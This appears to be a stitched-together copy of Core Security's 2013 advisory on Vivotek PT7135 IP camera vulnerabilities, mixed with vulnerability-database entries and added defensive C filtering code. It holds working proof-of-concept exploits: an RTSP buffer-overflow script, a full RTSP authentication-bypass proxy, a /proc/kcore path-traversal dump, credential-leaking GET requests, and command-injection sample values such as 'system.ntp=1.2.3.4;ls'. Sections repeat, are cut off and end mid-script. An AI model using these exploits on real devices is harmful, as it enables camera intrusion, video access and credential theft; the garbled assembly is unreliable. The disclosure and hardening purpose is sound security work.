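 * copies the value of key (up to '&', ' ' or end of string) into out.
 * Returns false when the key is absent. */
static bool query_param(const char *req, const char *key, char *out, size_t out_size)
{
    const char *q = strchr(req, '?');
    if (q == NULL)
        return false;
    size_t klen = strlen(key);
    for (const char *p = q + 1; *p; p++) {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=' &&
            (p == q + 1 || p[-1] == '&')) {
            const char *v = p + klen + 1;
            size_t i = 0;
            while (v[i] && v[i] != '&' && v[i] != ' ' && i + 1 < out_size) {
                out[i] = v[i];
                i++;
            }
            out[i] = '\0';
            return true;
        }
    }
    return false;
}

/* Returns a short reason when the request line matches one of the advisory's
 * filter rules, or NULL when it may pass:
 *   - "/../" anywhere in the path (the /proc/kcore traversal, section 8.4)
 *   - a request for getparam.cgi (plain-text credential dump, section 8.1)
 *   - a system.ntp parameter outside hostname/IPv4 syntax (section 8.5) */
const char *request_filter_reason(const char *request_line)
{
    char value[512];
    if (strstr(request_line, "/../") != NULL)
        return "path traversal";
    if (strstr(request_line, "getparam.cgi") != NULL)
        return "getparam.cgi";
    if (query_param(request_line, "system.ntp", value, sizeof value) &&
        !ntp_value_is_safe(value))
        return "unsafe system.ntp value";
    return NULL;
}

int main(void)
{
    /* Constructed sample request lines, one per rule plus two benign ones. */
    const char *samples[] = {
        "GET /cgi-bin/viewer/video.jpg HTTP/1.1",
        "GET /../../../../../../../../../proc/kcore HTTP/1.1",
        "GET /cgi-bin/admin/getparam.cgi HTTP/1.1",
        "GET /cgi-bin/admin/setparam.cgi?system.ntp=pool.ntp.org HTTP/1.1",
        "GET /cgi-bin/admin/setparam.cgi?system.ntp=1.2.3.4;ls HTTP/1.1",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *why = request_filter_reason(samples[i]);
        printf("%-5s %s%s%s\n", why ? "BLOCK" : "PASS", samples[i],
               why ? "  <- " : "", why ? why : "");
    }
    return 0;
}
```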
9. *Report Timeline*
. 2013-03-06: Core Security Technologies notifies the Vivotek Customer
Support of the vulnerability (tracking ID CRM:00930113) and requests a
security manager to send a draft report regarding these vulnerabilities.
No reply received.
. 2013-03-11: Core asks for a security manager to send a confidential
report.
. 2013-03-14: Core notifies the Vivotek Technical Support of the
vulnerability (tracking ID CRM:00930485).
. 2013-03-18: Core opens a new ticket in the Vivotek Technical Support
(tracking ID CRM:00930670).
. 2013-03-21: Core asks for a reply regarding the tracking ID
CRM:00930485.
. 2013-04-24: Core tries to contact vendor for last time without any
reply.
. 2013-04-29: After 6 failed attempts to report the issues, the advisory
CORE-2013-0301 is published as 'user-release'.
10. *References*
[1] http://www.vivotek.com/web/product/NetworkCameras.aspx
[2] http://www.securityfocus.com/bid/54476.
[3] Alejandro Leon Morales [Gothicx] http://www.undermx.blogspot.mx.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0836 | CVE-2013-1596 |
Vivotek Network Cameras Information Disclosure Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0004 |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
An Authentication Bypass Vulnerability exists in Vivotek PT7135 IP Camera 0300a and 0400a via specially crafted RTSP packets to TCP port 554. The Vivotek PT7135 IP Camera contains an authentication vulnerability. Information may be obtained. Vivotek Network Cameras are wireless network cameras. Vivotek Network Cameras fail to properly handle user-submitted requests, allowing remote attackers to submit malicious requests for sensitive information such as FTP and DYNDNS credentials.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks.
this memory dump by an unauthenticated remote attacker (firmware 0300a).
The same attack is still valid with firmware 0400a but the user has to
be authenticated in order to exploit this flaw.
/-----
import httplib
conn = httplib.HTTPConnection("192.168.1.100")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
-----/
8.5. *OS Command Injection*
[CVE-2013-1598] The command injection is located in the binary file
'farseer.out' in the parameter 'system.ntp':
/-----
.text:0000CB34 MOV R1, R4
.text:0000CB38 LDR R0, =aCmdporcessStar ; "[CmdPorcess] Start sync with NTP server %s"...
.text:0000CB3C ADD R10, SP, #0x144+var_120
.text:0000CB40 BNE loc_CB68
[...]
.text:0000CB68 BL .printf
.text:0000CB6C LDR R2, =aSS_0 ; "%s%s"
.text:0000CB70 LDR R3, =aUsrSbinPsntpda ; "/usr/sbin/psntpdate -4fr "
.text:0000CB74 MOV R1, #0xFF ; maxlen
.text:0000CB78 MOV R0, R10 ; s
.text:0000CB7C STR R4, [SP,#0x144+var_144]
.text:0000CB80 BL .snprintf
.text:0000CB84 MOV R0, R10 ; command
.text:0000CB88 BL .system
-----/
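The disassembly shows the whole bug: the value of 'system.ntp' is appended to "/usr/sbin/psntpdate -4fr " with snprintf("%s%s") and the result is handed to system(), so shell metacharacters in the parameter become commands. As an added example (not code from the Core advisory or the Vivotek firmware), the same construction written in C next to a hardened replacement that allow-lists the host and runs the binary through execv, with no shell in between; the function names are assumptions made for illustration.

```c
/* Added example, not from the advisory: the command construction recovered
 * from farseer.out (section 8.5) beside a hardened version. Function names
 * (build_ntp_command_unsafe, valid_ntp_host, ...) are assumed for illustration. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define NTP_HOST_MAX 253   /* maximum length of a DNS name */

/* 1. The pattern in the disassembly: snprintf(s, 0xFF, "%s%s", prefix, value).
 *    Only the string build is reproduced; the firmware then calls system() on
 *    it, which is the injection point. The 0xFF bound stops an overflow, not
 *    the injection. */
int build_ntp_command_unsafe(const char *ntp_value, char *out, size_t outlen)
{
    return snprintf(out, outlen, "%s%s", "/usr/sbin/psntpdate -4fr ", ntp_value);
}

/* 2. Allow-list check for the system.ntp value: hostname or IPv4 literal
 *    characters only (letters, digits, '.', '-'), no empty labels, and no
 *    leading '-' or '.' so the value can never be parsed as an option. */
int valid_ntp_host(const char *host)
{
    size_t len = strlen(host);
    if (len == 0 || len > NTP_HOST_MAX) return 0;
    if (host[0] == '-' || host[0] == '.') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!(isalnum(c) || c == '.' || c == '-')) return 0;   /* rejects ; | ` $ etc. */
        if (c == '.' && host[i + 1] == '.') return 0;           /* no empty labels */
    }
    return 1;
}

/* 3. Build an argv vector: the host is always exactly one argument, so no
 *    character in it is interpreted by a shell. Returns -1 on rejection. */
int build_ntp_argv(const char *host, const char *argv[4])
{
    if (!valid_ntp_host(host)) return -1;
    argv[0] = "/usr/sbin/psntpdate";
    argv[1] = "-4fr";
    argv[2] = host;
    argv[3] = NULL;
    return 0;
}

/* 4. Hardened replacement for the system() call: fork + execv with the argv
 *    above. Returns the child's exit status, or -1 if the host was rejected
 *    or the process could not be started. */
int run_ntp_sync_safe(const char *host)
{
    const char *argv[4];
    if (build_ntp_argv(host, argv) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv(argv[0], (char *const *)argv);
        _exit(127);                       /* exec failed in the child */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample values: a legitimate host and one carrying a ';'. */
    const char *samples[] = { "ntp.example.org", "ntp.example.org;id", "-4fr" };
    char cmd[0xFF];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        build_ntp_command_unsafe(samples[i], cmd, sizeof cmd);
        printf("unsafe command string : %s\n", cmd);
        printf("allow-list verdict    : %s\n\n",
               valid_ntp_host(samples[i]) ? "accepted" : "rejected");
    }
    return 0;
}
```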
9. *Report Timeline*
. 2013-03-06:
Core Security Technologies notifies the Vivotek Customer Support of the
vulnerability (tracking ID CRM:00930113) and requests a security manager
to send a draft report regarding these vulnerabilities. No reply received.
. 2013-03-11:
Core asks for a security manager to send a confidential report.
. 2013-03-14:
Core notifies the Vivotek Technical Support of the vulnerability
(tracking ID CRM:00930485).
. 2013-03-18:
Core opens a new ticket in the Vivotek Technical Support (tracking ID
CRM:00930670).
. 2013-03-21:
Core asks for a reply regarding the tracking ID CRM:00930485.
. 2013-04-24:
Core tries to contact vendor for last time without any reply.
. 2013-04-29:
After 6 failed attempts to report the issues, the advisory
CORE-2013-0301 is published as 'user-release'.
10. *References*
[1] http://www.vivotek.com/web/product/NetworkCameras.aspx
[2] http://www.securityfocus.com/bid/54476
[3] Alejandro Leon Morales [Gothicx] http://www.undermx.blogspot.mx
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0838 | CVE-2013-1598 |
Vivotek Network Cameras Information Disclosure Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0004 |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
A Command Injection vulnerability exists in Vivotek PT7135 IP Cameras 0300a and 0400a via the system.ntp parameter to the farseer.out binary file, which could let a malicious user execute arbitrary code. An OS command injection vulnerability exists in the Vivotek PT7135 IP Camera: information may be obtained or falsified, and a denial-of-service (DoS) condition may result. Vivotek Network Cameras are wireless network cameras. Vivotek Network Cameras failed to properly handle user-submitted requests, allowing remote attackers to submit malicious requests for sensitive information such as FTP and DYNDNS credentials.
Exploiting this issue could allow an attacker to execute arbitrary commands in the context of the affected device.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks.
| VAR-202001-0834 | CVE-2013-1594 |
Vivotek Network Cameras Information Disclosure Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0004 |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
An Information Disclosure vulnerability exists via a GET request in Vivotek PT7135 IP Camera 0300a and 0400a due to wireless keys and 3rd party credentials stored in clear text. The Vivotek PT7135 IP Camera contains an information disclosure vulnerability; information may be obtained. Vivotek Network Cameras are wireless network cameras. Vivotek Network Cameras failed to properly handle user-submitted requests, allowing remote attackers to submit malicious requests for sensitive information such as FTP and DYNDNS credentials.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks.
Title: Vivotek IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0301
Advisory URL:
http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-04-29
Vendors contacted: Vivotek
Release mode: User release
2. *Vulnerability Information*
Class: Information leak through GET request [CWE-598], Buffer overflow
[CWE-119], Authentication issues [CWE-287], Path traversal [CWE-22], OS
command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1594, CVE-2013-1595, CVE-2013-1596, CVE-2013-1597,
CVE-2013-1598
3. [CVE-2013-1594] to process GET requests that contain sensitive
information,
2. [CVE-2013-1595] to execute arbitrary code,
3. [CVE-2013-1596] to access the video stream via RTSP,
4. [CVE-2013-1597] to dump the camera's memory and retrieve user
credentials,
5. [CVE-2013-1598] to execute arbitrary commands from the
administration web interface (pre-authentication with firmware 0300a and
post-authentication with firmware 0400a).
4. *Vulnerable Packages*
. Vivotek PT7135 IP camera with firmware 0300a. Vivotek PT7135 IP camera with firmware 0400a. Other Vivotek cameras/firmware are probably affected too, but they
were not checked.
5. *Non-Vulnerable Packages*
Vendor did not provide details. Contact Vivotek for further information.
6. *Vendor Information, Solutions and Workarounds*
There was no official answer from Vivotek after several attempts to
report these vulnerabilities (see [Sec. 9]). Contact vendor for further
information.
Some mitigation actions may be:
. Do not expose the camera to internet unless absolutely necessary. Filter RTSP traffic (default port 554) if possible. Have at least one proxy filtering '/../../' and 'getparam.cgi' in
HTTP requests. Filter strings in the parameter 'system.ntp' on every request made
to the binary 'farseer.out'.
7. *Credits*
[CVE-2013-1594] was originally discovered and reported [2] by Alejandro
Leon Morales [3] and re-discovered on new firmware versions by Flavio De
Cristofaro from Core Security.
[CVE-2013-1595] and [CVE-2013-1596] were discovered and researched by
Martin Rocha from Core Impact Pro Team. The PoC of [CVE-2013-1596] was
made by Martin Rocha with help of Juan Cotta from Core QA Team.
[CVE-2013-1597] and [CVE-2013-1598] were discovered and researched by
Francisco Falcon and Nahuel Riva from Core Exploit Writers Team.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. Sensitive information stored in plain text includes:
. FTP credentials
. Share folder credentials
. SMTP credentials
. WEP / WPA Keys
. DynDNS credentials
. Safe100.net credentials
. TZO credentials, among others.
The following GET requests can exploit the vulnerability (requests may
change according to firmware versions and vendors devices):
/-----
http://192.168.1.100/cgi-bin/admin/getparam.cgi
http://192.168.1.100/setup/parafile.html
-----/
8.2. *Remote Buffer Overflow*
[CVE-2013-1595] The following Python script can be used to trigger the
vulnerability. This script will send to the RTSP service a specially
crafted packet with the header field 'Authorization' fully completed
with the character 'a' (0x61). As a result, the Instruction Pointer
register (IP) will be overwritten with 0x61616161, which is a typical
buffer overrun condition.
/-----
import socket, base64
cam_ip = '192.168.1.100'
session_descriptor = 'live.sdp'
request = 'DESCRIBE rtsp://%s/%s RTSP/1.0\r\n' % (cam_ip,
session_descriptor)
request+= 'CSeq: 1\r\n'
request+= 'Authorization: Basic %s\r\n'
request+= '\r\n'
auth_little = 'a' * 1000
auth_big = 'a' * 10000
msgs = [request % auth_little, request % auth_big]
for msg in msgs:
s = socket.socket()
s.connect((cam_ip, 554))
print s.send(msg)
print s.recv(0x10000)
s.close()
-----/
8.3. *RTSP Authentication Bypass*
[CVE-2013-1596] This vulnerability is triggered by sending specially
crafted RTSP packets to remote TCP port 554 of a Vivotek PT7135 camera.
As a result, the video stream can be accessed by an unauthenticated
remote attacker.
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class Vivotek(Camera):
# Vivotek PT7135/0400a
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return 'v=0\r\no=RTSP 836244 0 IN IP4 0.0.0.0\r\ns=RTSP
server\r\nc=IN IP4 0.0.0.0\r\nt=0
0\r\na=charset:Shift_JIS\r\na=range:npt=0-\r\na=control:*\r\na=etag:1234567890\r\nm=video
0 RTP/AVP 96\r\nb=AS:1200\r\na=rtpmap:96
MP4V-ES/30000\r\na=control:trackID=1\r\na=fmtp:96
profile-level-id=3;config=000001B003000001B509000001000000012000C48881F4514043C1463F;decode_buf=76800\r\nm=audio
0 RTP/AVP 97\r\na=control:trackID=3\r\na=rtpmap:97
mpeg4-generic/16000/2\r\na=fmtp:97 streamtype=5; profile-level-id=15;
mode=AAC-hbr; config=1410;SizeLength=13; IndexLength=3;
IndexDeltaLength=3; CTSDeltaLength=0; DTSDeltaLength=0;\r\n'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, Vivotek((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
8.4. *User Credentials Leaked via Path Traversal*
[CVE-2013-1597] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker (firmware 0300a).
The same attack is still valid with firmware 0400a but the user has to
be authenticated in order to exploit this flaw.
/-----
import httplib
conn = httplib.HTTPConnection("192.168.1.100")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
-----/
8.5. *OS Command Injection*
[CVE-2013-1598] The command injection is in the binary 'farseer.out': the
value of the parameter 'system.ntp' is appended to the string
"/usr/sbin/psntpdate -4fr " with snprintf (maxlen 0xFF) and the result is
passed, unfiltered, to system(), as the following disassembly shows:
/-----
.text:0000CB34 MOV R1, R4
.text:0000CB38 LDR R0, =aCmdporcessStar ; "[CmdPorcess] Start sync with NTP server %s"...
.text:0000CB3C ADD R10, SP, #0x144+var_120
.text:0000CB40 BNE loc_CB68
[...]
.text:0000CB68 BL .printf
.text:0000CB6C LDR R2, =aSS_0 ; "%s%s"
.text:0000CB70 LDR R3, =aUsrSbinPsntpda ; "/usr/sbin/psntpdate -4fr "
.text:0000CB74 MOV R1, #0xFF ; maxlen
.text:0000CB78 MOV R0, R10 ; s
.text:0000CB7C STR R4, [SP,#0x144+var_144]
.text:0000CB80 BL .snprintf
.text:0000CB84 MOV R0, R10 ; command
.text:0000CB88 BL .system
-----/
9. *Report Timeline*
. 2013-03-06:
Core Security Technologies notifies the Vivotek Customer Support of the
vulnerability (tracking ID CRM:00930113) and requests a security manager
to send a draft report regarding these vulnerabilities. No reply received.
. 2013-03-11:
Core asks for a security manager to send a confidential report.
. 2013-03-14:
Core notifies the Vivotek Technical Support of the vulnerability
(tracking ID CRM:00930485).
. 2013-03-18:
Core opens a new ticket in the Vivotek Technical Support (tracking ID
CRM:00930670).
. 2013-03-21:
Core asks for a reply regarding the tracking ID CRM:00930485.
. 2013-04-24:
Core tries to contact the vendor for the last time, without any reply.
. 2013-04-29:
After 6 failed attempts to report the issues, the advisory
CORE-2013-0301 is published as 'user-release'.
10. *References*
[1] http://www.vivotek.com/web/product/NetworkCameras.aspx
[2] http://www.securityfocus.com/bid/54476
[3] Alejandro Leon Morales [Gothicx], http://www.undermx.blogspot.mx
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0835 | CVE-2013-1595 |
Vivotek Network Cameras Information Disclosure Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0004 |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A buffer overflow vulnerability exists in the Vivotek PT7135 IP Camera with firmware 0300a and 0400a: a specially crafted packet with an oversized Authorization header field, sent to the RTSP service, could let a remote malicious user execute arbitrary code or cause a denial of service. The Vivotek PT7135 IP Camera therefore contains a classic buffer overflow; successful exploitation may disclose information, alter information, or cause a denial of service (DoS). Vivotek Network Cameras is a line of wireless network cameras. Vivotek Network Cameras fail to properly handle user-submitted requests, allowing remote attackers to submit malicious requests for sensitive information such as FTP and DynDNS credentials.
Attackers can exploit this issue to execute arbitrary code in the context of the affected device. Failed attacks will cause denial-of-service conditions.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks.
1. *Advisory Information*
Title: Vivotek IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0301
Advisory URL:
http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-04-29
Vendors contacted: Vivotek
Release mode: User release
2. *Vulnerability Information*
Class: Information leak through GET request [CWE-598], Buffer overflow
[CWE-119], Authentication issues [CWE-287], Path traversal [CWE-22], OS
command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1594, CVE-2013-1595, CVE-2013-1596, CVE-2013-1597,
CVE-2013-1598
3. *Vulnerability Description*
Multiple vulnerabilities have been found in Vivotek IP cameras [1] that
could allow a remote attacker:
1. [CVE-2013-1594] to process GET requests that contain sensitive
information,
2. [CVE-2013-1595] to execute arbitrary code or crash the RTSP service
through a buffer overflow in the Authorization header,
3. [CVE-2013-1596] to access the video stream via RTSP,
4. [CVE-2013-1597] to dump the camera's memory and retrieve user
credentials,
5. [CVE-2013-1598] to execute arbitrary commands from the
administration web interface (pre-authentication with firmware 0300a and
post-authentication with firmware 0400a).
4. *Vulnerable Packages*
. Vivotek PT7135 IP Camera, firmware 0300a.
. Vivotek PT7135 IP Camera, firmware 0400a.
. Other Vivotek cameras/firmware are probably affected too, but they
were not checked.
5. *Non-Vulnerable Packages*
Vendor did not provide details. Contact Vivotek for further information.
6. *Vendor Information, Solutions and Workarounds*
There was no official answer from Vivotek after several attempts to
report these vulnerabilities (see [Sec. 9]). Contact vendor for further
information.
Some mitigation actions may be:
. Do not expose the camera to the internet unless absolutely necessary.
. Filter RTSP traffic (default port 554) if possible.
. Have at least one proxy filtering '/../../' and 'getparam.cgi' in
HTTP requests.
. Filter strings in the parameter 'system.ntp' on every request made
to the binary 'farseer.out'.
7. *Credits*
[CVE-2013-1594] was originally discovered and reported [2] by Alejandro
Leon Morales [3] and re-discovered on new firmware versions by Flavio De
Cristofaro from Core Security.
[CVE-2013-1595] and [CVE-2013-1596] were discovered and researched by
Martin Rocha from Core Impact Pro Team. The PoC of [CVE-2013-1596] was
made by Martin Rocha with help of Juan Cotta from Core QA Team.
[CVE-2013-1597] and [CVE-2013-1598] were discovered and researched by
Francisco Falcon and Nahuel Riva from Core Exploit Writers Team.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. *Information Leak through GET Request*
[CVE-2013-1594] The camera stores sensitive configuration values in plain
text and returns them in response to GET requests. Sensitive information
stored in plain text includes:
. FTP credentials
. Share folder credentials
. SMTP credentials
. WEP / WPA Keys
. DynDNS credentials
. Safe100.net credentials
. TZO credentials, among others.
The following GET requests can exploit the vulnerability (the exact
requests may change with firmware version and device model):
/-----
http://192.168.1.100/cgi-bin/admin/getparam.cgi
http://192.168.1.100/setup/parafile.html
-----/
8.2. *Remote Buffer Overflow*
[CVE-2013-1595] The following Python script can be used to trigger the
vulnerability: it sends RTSP DESCRIBE requests to TCP port 554 whose
Basic Authorization header carries first 1000 and then 10000 bytes of
'a'. The oversized header overruns a fixed-size buffer and the
instruction pointer register is overwritten with 0x61616161 (the ASCII
bytes 'aaaa' from the padding), a typical buffer overrun condition.
/-----
import socket

cam_ip = '192.168.1.100'
session_descriptor = 'live.sdp'
# DESCRIBE request with a placeholder for the Basic credential
request = 'DESCRIBE rtsp://%s/%s RTSP/1.0\r\n' % (cam_ip, session_descriptor)
request += 'CSeq: 1\r\n'
request += 'Authorization: Basic %s\r\n'
request += '\r\n'
auth_little = 'a' * 1000
